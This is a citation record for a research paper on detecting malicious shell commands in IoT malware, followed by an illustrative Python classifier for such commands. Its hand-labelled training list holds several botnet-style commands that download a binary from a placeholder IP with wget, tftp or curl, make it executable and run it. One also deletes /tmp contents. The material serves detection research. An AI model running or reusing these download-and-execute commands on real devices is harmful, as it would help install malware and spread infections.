TY - JOUR
T1 - ShellCore
T2 - Automating Malicious IoT Software Detection Using Shell Commands Representation
AU - Alasmary, Hisham
AU - Anwar, Afsah
AU - Abusnaina, Ahmed
AU - Alabduljabbar, Abdulrahman
AU - Abuhamad, Mohammed
AU - Wang, An
AU - Nyang, Daehun
AU - Awad, Amro
AU - Mohaisen, David
N1 - Publisher Copyright:
© 2014 IEEE.
PY - 2022/2/15
Y1 - 2022/2/15
N2 - The Linux shell is a command-line interpreter that provides users with a command interface to the operating system, allowing them to perform various functions. Although very useful in building capabilities at the edge, the Linux shell can be exploited, giving adversaries a prime opportunity to use it for malicious activities. With access to Internet of Things (IoT) devices, malware authors can abuse the Linux shell of those devices to propagate infections and launch large-scale attacks, e.g., Distributed Denial of Service. In this work, we provide a first look at the tasks managed by shell commands in Linux-based IoT malware toward detection. We analyze malicious shell commands found in IoT malware and build a neural network-based model, ShellCore, to detect malicious shell commands. Namely, we collected a large data set of shell commands, including malicious commands extracted from 2891 IoT malware samples and benign commands collected from real-world network traffic analysis and volunteered data from Linux users. Using conventional machine and deep learning-based approaches trained with term- and character-level features, ShellCore is shown to achieve an accuracy of more than 99% in detecting malicious shell commands and files (i.e., binaries).
KW - Internet of Things (IoT) security
KW - Linux shell commands
KW - machine learning
KW - malware detection
UR - http://www.scopus.com/inward/record.url?scp=85107354305&partnerID=8YFLogxK
U2 - 10.1109/JIOT.2021.3086398
DO - 10.1109/JIOT.2021.3086398
M3 - Article
AN - SCOPUS:85107354305
SN - 2327-4662
VL - 9
SP - 2485
EP - 2496
JO - IEEE Internet of Things Journal
JF - IEEE Internet of Things Journal
IS - 4
ER -
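The abstract describes representing each shell command at the term level and at the character level and training a classifier on those features. The block below is an added illustration of that representation, written for this page; it is not ShellCore's code and makes no claim about the paper's actual tokenizer, model, or data. It tokenizes commands on whitespace and shell metacharacters for the term view, uses character trigrams for the character view, and scores them with a small multinomial naive Bayes classifier written in pure Python so it runs without scikit-learn. The training commands are constructed for the example (the IP 198.51.100.7 is a documentation address, not a real host), and the labels are assigned by hand.

```python
"""Term- and character-level representation of shell commands, with a
multinomial naive Bayes classifier. Constructed example for this page: it is
not the ShellCore code, and every sample command below is made up."""
import math
import re
from collections import Counter, defaultdict

# Tokens are runs of characters that are not whitespace or the shell
# separators ; | & -- so "cd /tmp; wget x" yields cd, /tmp, wget, x.
_TERM_RE = re.compile(r"[^\s;|&]+")


def term_features(cmd: str) -> Counter:
    """Term-level view: bag of tokens, prefixed 't:' to keep views distinct."""
    return Counter("t:" + tok for tok in _TERM_RE.findall(cmd))


def char_features(cmd: str, n: int = 3) -> Counter:
    """Character-level view: bag of character n-grams over the padded command.
    Padding with one space on each side makes the first and last token visible
    as n-grams of their own."""
    padded = f" {cmd} "
    return Counter("c:" + padded[i:i + n] for i in range(len(padded) - n + 1))


def features(cmd: str) -> Counter:
    """Combined representation used for training and scoring."""
    return term_features(cmd) + char_features(cmd)


class NaiveBayes:
    """Multinomial naive Bayes with add-one (Laplace) smoothing."""

    def __init__(self):
        self.counts = defaultdict(Counter)  # label -> feature -> count
        self.totals = Counter()             # label -> total feature count
        self.docs = Counter()               # label -> number of samples
        self.vocab = set()

    def fit(self, samples):
        for cmd, label in samples:
            f = features(cmd)
            self.counts[label].update(f)
            self.totals[label] += sum(f.values())
            self.docs[label] += 1
            self.vocab.update(f)
        return self

    def log_posteriors(self, cmd: str) -> dict:
        """Unnormalised log P(label | cmd) for every label seen in training."""
        f = features(cmd)
        n_docs = sum(self.docs.values())
        v = len(self.vocab)
        out = {}
        for label in self.docs:
            score = math.log(self.docs[label] / n_docs)
            denom = self.totals[label] + v
            for feat, k in f.items():
                score += k * math.log((self.counts[label][feat] + 1) / denom)
            out[label] = score
        return out

    def predict(self, cmd: str) -> str:
        post = self.log_posteriors(cmd)
        return max(post, key=post.get)


# Constructed training set (hypothetical commands, hand-labelled).
MALICIOUS = [
    "cd /tmp; wget http://198.51.100.7/bins.sh; chmod +x bins.sh; sh bins.sh",
    "cd /var/run; tftp -g -r x86 198.51.100.7; chmod 777 x86; ./x86",
    "busybox wget http://198.51.100.7/arm7 -O /tmp/arm7; chmod +x /tmp/arm7; /tmp/arm7",
    "rm -rf /tmp/*; cd /tmp; curl -O http://198.51.100.7/mips; chmod 777 mips; ./mips",
    "cd /dev/shm; wget http://198.51.100.7/sh4 -O sh4; chmod +x sh4; ./sh4 telnet",
]
BENIGN = [
    "ls -la ~/projects",
    "git status",
    "grep -rn TODO src/",
    "tar -czf backup.tar.gz ~/documents",
    "docker ps -a",
    "sudo apt-get update",
    "ssh user@host.example.com",
    "python3 -m venv .venv",
]


def build_model() -> NaiveBayes:
    samples = [(c, "malicious") for c in MALICIOUS] + [(c, "benign") for c in BENIGN]
    return NaiveBayes().fit(samples)


MODEL = build_model()


def classify(cmd: str) -> str:
    """Label a command with the model trained on the constructed set above."""
    return MODEL.predict(cmd)


def top_features(cmd: str, k: int = 5) -> list:
    """Features of cmd with the largest log-odds towards 'malicious', so an
    analyst can see which terms or n-grams drove a verdict."""
    m, b = MODEL.counts["malicious"], MODEL.counts["benign"]
    v = len(MODEL.vocab)
    dm, db = MODEL.totals["malicious"] + v, MODEL.totals["benign"] + v
    odds = {f: math.log((m[f] + 1) / dm) - math.log((b[f] + 1) / db)
            for f in features(cmd)}
    return sorted(odds, key=odds.get, reverse=True)[:k]


if __name__ == "__main__":
    for c in ("cd /tmp; wget http://198.51.100.7/x86 -O x86; chmod +x x86; ./x86",
              "git log --oneline"):
        print(classify(c), top_features(c), c)
```

The two views catch different things: the term view keys on whole tokens such as `chmod`, `+x` or a download URL, while the character view still fires when an author renames the payload or splits a token, because trigrams like `/tm`, `htt` and `://` survive. With a handful of constructed samples the classifier is only a demonstration of the representation, not a substitute for a model trained on the kind of corpus the abstract describes.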